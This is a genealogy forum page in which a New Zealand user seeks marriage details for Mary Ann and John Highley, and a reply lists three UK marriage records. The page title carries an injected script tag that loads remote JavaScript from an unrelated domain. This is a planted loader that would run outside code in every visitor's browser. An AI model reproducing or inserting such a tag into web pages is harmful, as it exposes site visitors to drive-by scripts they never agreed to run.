Hazelwood/Highley<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script> :: FamilyTreeCircles.com Genealogy
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Journal by shihazel

Looking for information on Mary Ann and John Highley.Unable to find marriage place or date.They had daughter Alice born in New Zealand 1885.She married Percy Hazelwood in N.Z. in 1906.Alice and Percy I believe had 13 children.Have only been able to find 4

Surnames: HIGHLEY
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by shihazel Profile | Research | Contact | Subscribe | Block this user
on 2012-04-09 22:39:22

shihazel , from Auckland New Zealand, has been a Family Tree Circles member since Mar 2012.

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by SilverVixen on 2012-04-27 10:16:26

In UK Records
John Highley married Mary Ann Littlewood Sheffield, Yorkshire. 1865
John Highley married Mary Ann Usher Kensington, London. 1871
John Highley married Mary Ann Graham Todmorton, Yorkshire. 1884

My search was for years between 1849 -1885

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